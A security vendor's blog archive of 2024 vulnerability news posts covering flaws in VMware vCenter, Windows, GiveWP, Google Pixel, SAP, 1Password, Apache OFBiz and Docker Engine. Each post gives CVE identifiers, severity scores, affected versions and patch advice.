vulnerability Archives – Gridinsoft Blog

Critical VMWare vCenter Server RCE Vulnerability Fixed

Stephanie Adlam — Wed, 18 Sep 2024 14:06:14 +0000

On Tuesday, September 17, Broadcom released a security update that fixes a critical remote code execution flaw in VMWare vCenter Server software. Disclosed upon the patch release, this flaw has got a significant CVSS score of 9.8, reflective of how severe the exploitation consequences can be. The company offers no mitigation ways, just installing the latest security update.

VMWare vCenter Server RCE Vulnerability Disclosed

Under the course of the last update for the vCenter Server, Broadcom, a parent company of VMWare released a fix for two vulnerabilities in this software. A more severe of two – CVE-2024-38812 – is a remote code execution flaw present in the local implementation of a remote procedure call (RPC) protocol. More specifically, the vulnerability falls under the CWE-122 specification, which stands for heap overflow.

Official Broadcom notification about the flaw

By sending a specially crafted network packet, adversaries can overflow the memory of the program. This, in turn, forces it to execute code that they need. Such a flaw can circumvent both security policies of the program and, in quite a few cases, stand-alone security solutions. Considering that vCenter Server is a well-known and trusted software piece, security vendors do not check it too thoroughly. Also, there is another software solution from VMWare that has this flaw – their Cloud Foundation suite.

Vulnerability in a virtualization software like vCenter can hit pretty badly, especially when these virtualized environments are connected directly to the rest of the enterprise network. And even when everything is set up correctly, a spyware or a backdoor can create quite a mess in the infected virtual machine. What is worse, however, is the possibility of lateral movement and deployment of other malicious programs with the same exact malware. Sooner or later, attackers will find the way to “mainland” network, shall the vulnerability remain unpatched.

Another Flaw of vCenter Server

RCE heap overflow vulnerability is not the only weakness that Broadcom has fixed in this update. Another, slightly less severe flaw, coded CVE-2024-38813, allows attackers to escalate privileges to root level. Same as in the previous flaw, all they need for execution is a specially configured network package, sent to the vCenter environment. This makes up for its high CVSS score – 7.5, while other properties of the flaw are less severe otherwise.

As the virtualized environment has little to no connection to actual hardware, root-level privileges won’t give any more access than what the VM settings allow. So unlike with the RCE flaw, adversaries will not be able to use this vulnerability for initial access or lateral movement. At the same time, it may be pretty useful as an auxiliary tool: high privileges are always usable in any attack scenarios.

Mitigation and Patches

As I’ve mentioned in the introduction, Broadcom does not offer any other fix for the vulnerability other than installing the update. That is unfortunate, as updating all the virtualized infrastructure may turn out to be a rather tedious task. But the deep nature of both vulnerabilities supposes that there’s not much one can do by themselves, except for closing the environment from external network connections.

List of vulnerable and fixed software versions

Software	Versions vulnerable	Fixed in
vCenter Server	all 8.0 and 7.0	8.0 U3b 7.0 U3s
VMware Cloud Foundation	all 4.x and 5.x	Async patch to 8.0 U3b/7.0 U3s

The post Critical VMWare vCenter Server RCE Vulnerability Fixed appeared first on Gridinsoft Blog.

Top 3 Vulnerabilities of 2024: How to Block and Prevent

Stephanie Adlam — Sun, 15 Sep 2024 18:14:59 +0000

Any successful remote cyberattack starts with penetration of the target network. Regardless of the type of threat (spyware, ransomware, or infostealer), first it must be delivered before it can be deployed. Attackers use a variety of methods and tools to accomplish this. Some of them require some action on the part of the individual. Others, in turn, rely on vulnerabilities in the system and can be delivered and deployed without the victim’s involvement.

Top Vulnerabilities in 2024

From quite a few vulnerabilities that surfaced in 8 months of 2024, there are several that created significant fuss in the cybersecurity community. Key sign of the significance is, of course, the number of systems that may be impacted. Though, I won’t ignore other factors, like ease of exploitation and severity of possible consequences.

How Do Vulnerabilities Works?

There may also be a confusion on whether the flaw should be considered “top” or not depending on the frequency of its exploitation in cyberattacks. As some of the flaws keep circulating years after the initial discovery, you can sometimes see ratings that include those “past” vulnerabilities. For certain years, these overdue weaknesses were dominant, despite all the vulnerabilities discovered the same year. In this article, I will concentrate exclusively on ones discovered in 2024, with all the other mentioned characteristics in mind.

Critical RCE Threat in Windows TCP/IP Stack

CVE-2024-38063 is a critical vulnerability in Windows 10/11 that allows remote code execution (RCE) via IPv6 packets. The vulnerability is rated CVSS 9.8 and affects Windows 10, Windows 11 and Windows Server 2008-2022. Security researcher Marcus Hutchins has published a detailed analysis of the vulnerability. He also noted that this vulnerability affects one of the most exposed parts of the Windows kernel, the tcpip.sys driver, which is responsible for processing TCP/IP packets. In other words, attackers can exploit this vulnerability by sending specially crafted IPv6 packets to the target machine, allowing RCE without user interaction.

For potential risks, if successful, attackers could gain access at the SYSTEM level. This eventually allows them to execute arbitrary code on the vulnerable system and compromise sensitive data. The former, in turn, is a classic way to deploy malware in cyberattacks of different grades. Microsoft has released the update and strongly recommends applying it as soon as possible. For ones who cannot apply the patch, Redmond recommends disabling IPv6 until the update becomes available in order to reduce the attack surface.

Fortunately, there were no exploitation cases known to the moment. But the fact that the vulnerability exposes individual users and corporations alike makes it worth keeping in mind and fixing when the opportunity arises.

Critical Remote Code Execution in Microsoft Project

Vulnerability CVE-2024-38189 is a critical remote code execution vulnerability that affects some Microsoft products. It affects Windows 10 and Windows Server 2019 and later, as well as various versions of Office, including Office 365. CVSS score of 8.8 clearly characterizes how much damage the attackers can do with this flaw. Unlike the previous vulnerability, exploiting CVE-2024-38189 requires user interaction, namely the attacker must convince the victim to open a special Microsoft Project file. However, in the era of Dark LLM-generated phishing emails, this will not be a problem for attackers.

The results of successful exploitation of this vulnerability are clear – remote access with privilege escalation. It can lead to data leakage and full control over the infected system, with potentially severe consequences. Microsoft has released an update, so the only task for users is to apply the update and pay attention to monitoring suspicious network activity. And with the vulnerability being actively exploited in the wild, this update should not be hesitated with.

RCE Flaw in Microsoft Exchange

The third vulnerability is CVE-2024-38178, which has a CVSS score of 7.5 and allows remote code execution attacks under certain conditions. Although this is a specific vulnerability, it poses a significant threat. Similar to the previous point, exploitation of this vulnerability requires an authenticated client to be tricked into clicking a malicious link. Moreover, the exploitation also requires the victim to use Microsoft Edge in Internet Explorer mode. However, South Korea’s National Cyber Security Center has reported that this vulnerability was potentially used in a state-sponsored APT attack.

The vulnerability arises from a flaw in web content processing, leading to remote code execution. This could result in unauthorized server control, data leaks, and significant server disruption. The attacker does not require direct access to the server, relying instead on tricking users. To ensure security, users should update their systems and consider disabling Internet Explorer mode in Microsoft Edge.

What Causes the Vulnerabilities to Appear?

Typical reasons for vulnerabilities to appear in programs is a bad software engineering, technology aging, software misusage, or all of them together. It is hard to trace the reason for each and every specific vulnerability, especially considering the sheer number of them. But it is obvious that the more complex the program is – the easier it is for something inside to broke, or be broken on purpose.

Make sure your system is up to date

The worst part about it is that you can’t really do anything to prevent the vulnerabilities from appearing (if you are not the developer of course). For users, and even corporations, the only way to secure themselves against negative consequences of vulnerability exploitation is to install all the recent updates. And even this won’t always be a guarantee of having no zero-day flaws.

How to prevent vulnerabilities?

To summarize, let me make a few recommendations to help reduce the likelihood of successful exploitation of vulnerabilities:

Install the latest updates. Proper software developers releases flaw fixes as part of their regular updates, and I strongly recommend not to ignore them. If it happens for you to use an end-of-service program, it is better to update to the newest version or seek for an alternative that still gets software updates. “Unsupported” does not mean “free of vulnerabilities”!
Use software from reliable developers. While vulnerabilities can appear in any software, from any developer, the likelyhood of this happening is much higher when you stick to solutions of no-name dev team. Large and renowned developers, aside from doing thorough testing, will also provide all the needed support and updates for their software.
Keep an eye on security news. Companies sometimes struggle with notifying their users in a timely manner. By checking out newsletters, you ensure being up to date about the recent flaws or attacks.

The post Top 3 Vulnerabilities of 2024: How to Block and Prevent appeared first on Gridinsoft Blog.

Critical RCE Vulnerability in GiveWP WordPress Plugin

Stephanie Adlam — Wed, 21 Aug 2024 16:28:57 +0000

A critical vulnerability has been discovered in the GiveWP WordPress plugin that leaves thousands of websites exposed. The vulnerability is of a high severity and allows for controlling the entire affected website without any authentication. A fix is currently available to address this vulnerability, so users should update as soon as possible.

Critical RCE vulnerability affects thousands of WordPress sites

A cybersecurity researcher has recently discovered a critical vulnerability called CVE-2024-5932. It has a CVSS score of 10.0 (max possible), and seriously compromises more than 100,000 WordPress sites using the GiveWP plugin version 3.14.1 and earlier. The issue involves a PHP Object Injection (POI) vulnerability in the GiveWP plugin, widely used by donation and fundraising platforms. The vulnerability is exploited by deserialization of untrusted data, in particular through the ‘give_title’ parameter. Attackers can inject a maliciously crafted PHP object. When combined with an existing object-oriented programming (OOP) chain in the plugin, this leads to full remote code execution (RCE).

CVE-2024-5932 vulnerability

In addition to remote code execution (RCE), this vulnerability allows for unauthorized file deletion without any authentication. In practice, this may allow attackers to gain full control over the affected WordPress site by deleting critical files from the server. Given the role of the plugin in managing financial transactions and sensitive donor information, the consequences of such an exploit are exceptionally serious.

Detection And Response

A security researcher nicknamed villu164 discovered the vulnerability on May 26, 2024, and reported it through the Wordfence Bug Bounty Program. On June 13, 2024, Wordfence notified the plugin developer of the vulnerability, but they did not receive any feedback. On July 6, 2024, the company informed the WordPress.org team. A month later, on August 7, 2024, the developer released a fully patched version 3.14.2. Fortunately, there are currently no reports or evidence that the vulnerability has been exploited in the wild. But as it usually happens, the exploitation will inevitably follow the public disclosure of the flaw.

As the plugin is described on the official website, GiveWP is the highest-rated, most downloaded, and best-supported donation plugin for WordPress. With GiveWP, users accept gifts for charity or other purposes through customizable donation forms. The donation plugin also allows you to view donor data and fundraising reports, manage donors, and integrate with various third-party gateways and services. In other words, the site interacts with finance and the people involved. It’s no surprise that it scored 10/10 on the CVSS scale – both the ease of exploitation and the amount of data it can expose are nothing to mess around with.

Recommendations

To protect their WordPress site, site masters should update the plugin to 3.14.2. Since there is no workaround available, websites running older versions remain highly vulnerable to exploitation, especially now that the vulnerability has been made public.

Still, a proactive approach towards picking plugins is a must. Even the well-known apps may be vulnerable, leave alone no-name plugins that were posted 2 years ago and never updated since. Tricks like typosquatting or supply chain attacks are applicable here as well, so stay updated on the latest WP security news.

The post Critical RCE Vulnerability in GiveWP WordPress Plugin appeared first on Gridinsoft Blog.

Google Pixel Devices Shipped with Vulnerable App

Stephanie Adlam — Fri, 16 Aug 2024 18:41:04 +0000

Recent research has uncovered a vulnerable app in the Android package on a whole bunch of Google Pixel smartphones. Devices shipped worldwide since September 2017 may be susceptible to malware deployment by malicious actors. This issue is linked to a pre-installed app called “Showcase.apk”, that is particularly used on showroom devices.

Google Pixel Phones Contain a Vulnerable Pre-Installed App

According to a recent report, Google Pixel devices shipped globally since September 2017 contain a severe vulnerability, latched within a pre-installed app. The application in question, Showcase.apk, can potentially expose millions of users to significant security risks. Researchers at iVerify discovered that this app has excessive system privileges. This enables it to remotely execute code and install arbitrary packages on the device.

Experts from other companies, including Palantir Technologies, and Trail of Bits state that the app poses considerable security risks for several reasons. First, it downloads a configuration file over an unprotected HTTP connection, making the file vulnerable to tampering. This allows attackers to execute code at the system level. The configuration file is downloaded from a single U.S.-based domain hosted on AWS, which further exacerbates the vulnerability. Also, the app is granted excessive privileges, which could have negative implications in certain scenarios, as discussed further.

Potential Exploitation Risks

The said APK file installs the Verizon Retail Demo Mode (“com.customermobile.preload.vzw”), a program developed by Smith Micro, a company specializing in enterprise software. In short, this app is designed to switch the devices into a showroom mode. It includes switching phones into demo mode, disabling certain features to prevent tampering or locking. This app requires nearly three dozen different permissions, including access to location and external storage. While the program itself is not inherently malicious – many companies use similar functionality – its implementation is somewhat different.

The main issue is that the app’s use of an unencrypted HTTP connection makes it vulnerable to “man-in-the-middle” (MitM) attacks. This could allow attackers to eavesdrop on the transferred data and inject their own Internet packages on the fly. This obviously opens gates to malicious code or spyware installation to the attacked device.

The good news is that the app is not enabled by default, meaning there is no potential attack surface unless it is activated. Despite the potential for abuse, there is currently no evidence that this vulnerability has been exploited in the wild. On the other hand, the app’s deep integration into the system firmware means users cannot uninstall it. At the same time, it could be activated if a threat actor gains physical access to the device and enables developer mode. Another possible case is when the phone may be vulnerable “out-of-box” is when one purchases a showroom stock device – large retailers often offer them at a nice discount, at the price of a used smartphone at times.

Google’s Response

Google responded to the research findings by stating that the vulnerability is not related to the Android platform or Pixel devices but rather to a package specifically developed for Verizon demo devices in stores. Additionally, Google emphasized that exploiting this app would require both physical access to the device and the user’s password. The company also noted that the app is not present on the latest Pixel 9 series devices and confirmed that it will be removed from all supported Pixel devices in a future software update. Showroom devices may need this software (or its equivalents) installed manually.

The post Google Pixel Devices Shipped with Vulnerable App appeared first on Gridinsoft Blog.

Critical Windows TCP/IP Vulnerability Uncovered, Patch Now

Stephanie Adlam — Thu, 15 Aug 2024 19:16:11 +0000

A critical vulnerability has been discovered in the Windows TCP/IP stack that allows unauthenticated remote code execution (RCE). This vulnerability can be exploited remotely by sending specially crafted IPv6 packets to the target system. Successful exploitation could allow an attacker to execute arbitrary code on the target system and affects all supported versions of Windows and Windows Server.

Windows TCP/IP RCE Vulnerability Impacts All Systems with IPv6 Enabled

Researcher XiaoWei from Kunlun Lab has reported the discovery of a critical remote code execution vulnerability in the Windows TCP/IP stack. The vulnerability, identified as CVE-2024-38063, carries a CVSS score of 9.8 and can be exploited without user interaction (zero-click). While details are scarce at the time of writing, it is known that an attacker can send IPv6 packets containing specially crafted payloads to the target system. CVE-2024-38063 affects all supported versions of Windows 10, 11, and Windows Server. It should be explicitly noted that the issue affects only IPv6 users, as it is impossible to send the said crafted v6 packets to an IPv4 address.

“Considering its harm, I will not disclose more details in the short term… The bug triggers before firewall handling the packet”.

Still, the research uncovers that CVE-2024-38063 leads to a buffer overflow. As a result, it allows an attacker to execute arbitrary code at the SYSTEM privileges level on the target system. This could potentially result in full control over the compromised system. Also, I expect to see more details as time goes on and the patch is installed on more systems, so the researcher can release the info with less risk.

Impact of such a vulnerability may have been tremendous, if Microsoft decided to ignore it or just missed it as a whole. These days, IPv6 is not that widespread, but experts around the world consider it to be the future of the Internet. And now, imagine the hackers being able to deploy malware to any device, any time without any user interaction. This is what could have happened should this flaw appear a decade later, after the global IPv6 introduction.

Microsoft’s Response and Mitigation

Microsoft noted that this is not the first vulnerability of this kind, and attackers have actively exploited previous ones. The company anticipates that attackers will eventually develop exploits to take advantage of this vulnerability. Fortunately, Microsoft already offers a fix in the form of its latest, August 2024 Patch Tuesday update. Additionally, organizations are advised to monitor network activity and implement network segmentation. These measures are intended to limit lateral movement of the threat in the event of a system compromise.

Microsoft also suggested a temporary workaround involving the disabling of the IPv6 protocol. However, the issue lies in the fact that IPv6 is enabled by default on most systems, and some Windows components rely on it. Disabling IPv6 could, therefore, disrupt the functionality of other Windows components.

The post Critical Windows TCP/IP Vulnerability Uncovered, Patch Now appeared first on Gridinsoft Blog.

Critical SAP Auth Bypass and SSRF Flaws Fixed, Update Now

Stephanie Adlam — Wed, 14 Aug 2024 14:30:31 +0000

SAP, the developer of business management software, released a huge security update that fixes numerous vulnerabilities in their software. Among them are severe authentication bypass and server-side request forgery vulnerabilities rated at CVSS 9.8 and 9.1 respectively. The company urges installing updates as soon as possible, as the mentioned flaws affect a substantial number of customers.

SAP Uncovers Auth Bypass and Request Forgery Vulnerabilities

In their latest update, released on August 13, 2024, SAP disclosed fixing 17 security flaws, among which 6 are considered critical. Though only two of them caught the eyes of security researchers the most: CVE-2024-41730 and CVE-2024-29415. And for a good reason – both have CVSS ratings of 9+, and may lead to painful consequences if exploited by adversaries.

Update notes for the August 2024 security update from SAP

First one, CVE-2024-41730, is an authentication bypass vulnerability that allows adversaries to extract logon tokens to SAP Business Intelligence Platform. This has some requirements to successfully work: the system should have Single Sign On (SSO) enabled for Enterprise authentication. Though, it is pretty common to see these settings enabled, so it should not be that much of an obstacle. And having the auth token for the application effectively means taking over it, with the potential of data leaks and/or malware deployment.

The CVE-2024-29415 flaw, in the case of successful exploitation, may cause server-side request forgery (SSRF). Software fails to interpret some of the IP addresses correctly, considering localhost (127.0.0.1) and similar IPs as globally routable. In simple words, hackers can command the server to connect to the arbitrary IP address, ignoring its current security configurations. Such a trick can result in massive data leaks and infrastructure exposure. It is also worth noting that the flaw likely stems from an incorrect fix of the previous similar vulnerability CVE-2023-42282.

List of critical flaws that SAP fixed in the August 2024 patch

Vulnerability	Severity Score
CVE-2024-41730	9.8
CVE-2024-29415	9.1
CVE-2024-42374	8.2
CVE-2023-30533	7.8
CVE-2024-34688	7.5
CVE-2024-33003	7.4

SAP Critical Vulnerabilities – Patches Available

Fortunately for the massive customer base of SAP products, the fixes are available right away. The company likely acknowledged the vulnerabilities quite some time ago, but never disclosed them publicly before having a proper fix. The list of software and versions that contain the fix is exceptionally huge, so if you use SAP, consider checking for updates and installing them right away.

Obviously, with such a large number of fixes, the company does not offer any mitigation instructions. Sure enough, one may say about disabling SSO for Enterprise authentication, but that is a less than favorable option. And overall, mitigations are only good when a proper solution is absent, but in this case it is already there.

The post Critical SAP Auth Bypass and SSRF Flaws Fixed, Update Now appeared first on Gridinsoft Blog.

1Password Vulnerability for MacOS Causes Credentials Leak

Stephanie Adlam — Fri, 09 Aug 2024 12:06:08 +0000

A critical vulnerability was discovered in 1Password that allows attackers to steal vault items by bypassing the app’s security measures. It affects only the macOS version of the program, and touches every single version of the app. A patch is now available, and users are strongly advised to update as soon as possible.

1Password Vulnerability Let Attackers Exfiltrate Vault Items

1Password developers reported a critical vulnerability found in the Mac version of the app. This vulnerability, identified as CVE-2024-42219, was discovered by Robinhood’s Red Team during an independent security assessment of 1Password for Mac. It allows a malicious process running locally on a computer to bypass protections for inter-process communication. This issue affects all app versions up to 8.10.36.

On macOS, 1Password uses the system-native XPC interface for inter-process communication. XPC allows enforcing additional protections called the hardened runtime which allows enforcing processes you communicate with have additional protections from process tampering. This prevents certain local attacks from being possible.1Password Support

Vulnerabilities in password managers are always a massive source of headache for both developers and users. Recent events around the LastPass password manager, that led to a huge leak of login credentials, is the perfect example of what may happen if that case is not managed properly. Fortunately, 1Password acknowledged the issue way before hackers started exploiting it in real-world attacks.

Technical Details

The CVE-2024-42219 vulnerability is related to bypassing inter-process communication (IPC) protections in 1Password for Mac across all versions up to 8.10.36. If a malicious process is running locally on the computer, it can circumvent these protections. This allows attackers to steal vault items and obtain credentials necessary for logging into 1Password, such as the account unlock key and SRP-𝑥 (Secure Remote Password) values. 1Password Vaults are secure containers for storing and organizing items, allowing users to share specific information with selected individuals. Essentially, they are mini password managers within the main application.

However, certain conditions are required to exploit this vulnerability: the attacker needs to convince the user to execute malicious software on their computer. During the attack, the absence of specific macOS checks for inter-process communication can be exploited. This allows the attacker to spoof or hijack trusted 1Password integrations, such as the browser extension or command-line interface. Fortunately, there have been no reports of this vulnerability being exploited in the wild.

1Password’s Response

1Password promptly released an update to patch this vulnerability as soon as they were notified. Details about the issue were disclosed on relevant news platforms after the patch was released, which upset some users who expected to see it in the changelog. However, it’s clear that the company maintained informational silence to ensure user safety.

1Password strongly recommends that all users update their app to version 8.10.36 as soon as possible to mitigate potential risks. The company also expressed gratitude to Robinhood’s team for responsibly disclosing the vulnerability and for their close collaboration, which ensured timely protection for users.

The post 1Password Vulnerability for MacOS Causes Credentials Leak appeared first on Gridinsoft Blog.

Windows COM Vulnerability Exploited by Chinese Hackers

Stephanie Adlam — Wed, 07 Aug 2024 15:02:10 +0000

A vulnerability in Windows COM, first discovered in 2018, has become the target of attacks once again. A Chinese hacker group, likely affiliated with the Ministry of State Security of the People’s Republic of China, has exploited this vulnerability in an attack on a research center in Taiwan. Microsoft offers a non-obvious solution to this problem.

Chinese Cybercriminals Are Exploiting A Vulnerability In Windows 10

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has included the CVE-2018-0824 vulnerability in its catalog of exploited vulnerabilities. This was prompted by a Cisco Talos report indicating that the Chinese group APT41 may have actively used this flaw in their attacks. In short, the vulnerability allows for privilege escalation and remote code execution, putting hundreds of millions of Windows 10 users at risk. Attackers, such as the Chinese group APT41, use this vulnerability to achieve local privilege escalation and remote code execution. They create custom loaders that inject code for CVE-2018-0824 exploitation directly into memory. This allows them to take control of the system.

The remote code execution vulnerability CVE-2018-0824 has a CVSS score of 7.5 and exists in “Microsoft COM for Windows” when it fails to properly handle serialized objects, known as the “Microsoft COM for Windows Remote Code Execution Vulnerability.” This vulnerability affects Windows 7, Windows Server 2012 R2, Windows RT 8.1, Windows Server 2008, Windows Server 2012, Windows 8.1, Windows Server 2016, Windows Server 2008 R2, Windows 10, and Windows 10 Server. An attacker exploiting this vulnerability could use a specially crafted file or script to perform actions. In an email attack, the attacker could send the file to the user and convince them to open it. In a web-based attack, the attacker could host a website containing the file and persuade the user to open it by clicking a link.

CVE-2018-0824 and Threat Actors

The primary threat actor known to exploit this vulnerability is APT41, a cyber group that, according to the U.S. government, consists of Chinese nationals. In August 2023, experts detected abnormal PowerShell commands connecting to an IP address to download and execute PowerShell scripts within a Taiwanese government-affiliated research institute’s environment. This attack, conducted by APT41, involved the use of a unique Cobalt Strike loader written in GoLang to evade detection. The attackers behind the operation were proficient in simplified Chinese, indicating their likely origin.

Although it might seem that APT41 poses a minimal risk to the average user, that’s not entirely accurate. Another threat actor, targeting all Windows users, is highlighted in other reports. SnakeKeylogger aka KrakenKeylogger is a new malicious software aimed at Windows users, and not mandatory ones from within a corporate network. This malware logs keystrokes, steals credentials, and takes screenshots to gather sensitive information, which is then sent to fraudsters. This malware typically spreads through phishing campaigns, where malicious code is hidden in email attachments.

Avaliable Solutions

Although a patch for CVE-2018-0824 has been available for a long time, attackers continue to exploit it. On the other hand, SnakeKeylogger remains a significant threat to users. So, here are several solutions to address these issues:

Upgrade to Windows 11. One radical solution for Windows 10 users is to upgrade to Windows 11. However, there is a significant problem: many users are reluctant to switch to Windows 11. The primary reason is that Windows 11 has higher system requirements, and not all users can upgrade their hardware to support the new system. Many users remain on Windows 10 despite security warnings due to resource limitations and the unwillingness to spend money on new equipment.

Use Advanced System Protection. There is also a workaround solution — blocking attacks with the advanced system protection. GridinSoft Anti-Malware is the one you can rely on in this question. This program will prevent any malware from getting into the system, even before they can do any harm. While using an outdated version of Windows is not the best solution, employing an advanced anti-malware program can significantly reduce risks.

The post Windows COM Vulnerability Exploited by Chinese Hackers appeared first on Gridinsoft Blog.

Apache OFBiz RCE Vulnerability Discovered, Patch Now

Stephanie Adlam — Tue, 06 Aug 2024 13:14:57 +0000

A vulnerability, CVE-2024-38856, has been discovered in Apache OFBiz that allows unauthenticated remote code execution. A patch is currently available, and the developer heavily recommends installing it, as hackers will not hesitate exploiting the issue after the disclosure. Considering the high CVSS score of the flaw, not much more motivation should be given.

Critical Apache OFBiz Flaw Allows Unauthorized Code Execution

Cybersecurity researchers have discovered a critical zero-day vulnerability in Apache OFBiz. The authorization flaw, identified as CVE-2024-38856, has a CVSS score of 9.8 and affects versions up to 18.12.14. Successful exploitation allows attackers to execute arbitrary code on vulnerable systems without authentication.

CVE-2024-38856 exploit request in version 18.12.14 (Source: SonicWall)

Apache OFBiz is an open-source framework for enterprise resource planning (ERP). It includes web applications that cater to common business needs such as accounting, human resources, inventory management, customer relationship management, marketing, and more. Companies like United Airlines, Atlassian JIRA, HP Development Company, and Upwork Global Inc., among approximately 170 others, use this service. Organizations using it have been advised to promptly address this critical vulnerability.

CVE-2024-38856 Overview

During analysis, researchers observed that an attacker could gain control of the system and execute screen rendering code under certain conditions without proper authentication.
The issue stemmed from certain parts of the system failing to correctly verify authentication. This allowed unauthorized access to specific system components. This happens because the application does not check for any authentication for the command, relying on endpoint configurations instead.

This, in fact, is not the first vulnerability in Apache OFBiz in recent months. The previous vulnerability, CVE-2023-51467, also had a CVSS score of 9.8. It was related to the login function and resulted from an incomplete fix of a previous critical vulnerability, CVE-2023-49070. The latter was a flaw that also allowed for RCE, potentially leading to complete server control and theft of sensitive data.

RCE/ACE vulnerabilities have their deserved place among the most dangerous flaws. Being capable of providing both initial access and lateral movement, they are a desired thing for any adversary, at any attack stage. And considering the placement of the CVE-2024-38856 flaw, its successful exploitation may be a key to leaking tons of important internal information.

Apache OFBiz Flaw Patched

Unlike the mentioned vulnerabilities, which attackers actively attempted to exploit, there have been no reports of CVE-2024-38856 being exploited in the wild at the time of writing. Though there is an obvious tendency for hackers to start exploiting the flaw soon after the disclosure. That happened with some of the previous vulnerabilities in Apache products, and I have no doubt that this will happen to this one, too.

Regardless, the Apache OFBiz team released a patch for CVE-2024-38856 within 24 hours after the disclosure. Companies that use OFBiz should update to version 18.12.15, which addresses the vulnerability. Unfortunately, no workaround is available, meaning that applying the update is the only fix option.

The post Apache OFBiz RCE Vulnerability Discovered, Patch Now appeared first on Gridinsoft Blog.

Docker Engine Authentication Bypass Vulnerability Exploited

Stephanie Adlam — Thu, 25 Jul 2024 18:18:11 +0000

Attackers are actively exploiting a critical vulnerability in the Docker Engine that may allow for authentication bypass in a chain attack. This vulnerability allows attackers to bypass AuthZ authorization plugins, effectively mutilating any auth control. For this and several other reasons, the flaw got the max severity score possible (10.0).

Critical Docker Engine Flaw Allows Attackers to Bypass Authorization Plugins

Docker has reported a critical vulnerability in a selection of versions of their Docker Engine. This vulnerability enables threat actors to bypass authorization plugins (AuthZ) under specific conditions. The vulnerability in question is CVE-2024-41110, rated at CVSS score: 10.0.

Vulnerability-affected versions

The “predecessor” of this flaw in fact appeared back in 2018, and patched in January 2019. However, in April 2024, the flaw re-surfaced in modern versions of the software suite. The developers explain that this happened because they have missed to transfer the fixes to newer versions of the program.

In summary, CVE-2024-41110 allows attackers to send a specially crafted API request with a Content-Length of 0, tricking the Docker daemon into bypassing the AuthZ plugin. Typically, API requests contain a body that the authorization plugin checks to make access control decisions. When the Content-Length is set to 0, the plugin receives the request without a body, preventing proper validation and potentially leading to the approval of unauthorized actions, including privilege escalation.

And that explains the max CVSS score. Authentication bypass vulnerabilities are as bad as RCE/ACE ones, and may have similar application areas. Adversaries can easily use them to gain initial access, or perform lateral movement. At the very least, frauds can access the data stored on Docker and leak it to someone on the outside.

Risk Group & Vulnerability Patches

As for the potential risks, the versions at risk include Docker Engine v19.03.x and later versions that use authorization plugins for access control decisions. Ones who do not run any auth plugins should be safe from any attacks of that vector. Additionally, there is a limited risk for Docker Desktop users up to version 4.32.0. However, for this to be exploited, the threat actor must have local access to the host machine, or the Docker daemon must be insecurely exposed via TCP.

On the other hand, versions of Engine suite, commercial products of the developer, and internal infrastructure that do not rely on authorization plugins for access control decisions, as well as users of all versions of Mirantis Container Runtime, are not vulnerable.

Docker devs have released an update (docker-ce v27.1.1) that fixes the flaw, and strongly recommend that users update Docker Engine. If the update cannot be applied for some reason, the developers recommends at least to disable AuthZ plugins until the update can be applied.

The post Docker Engine Authentication Bypass Vulnerability Exploited appeared first on Gridinsoft Blog.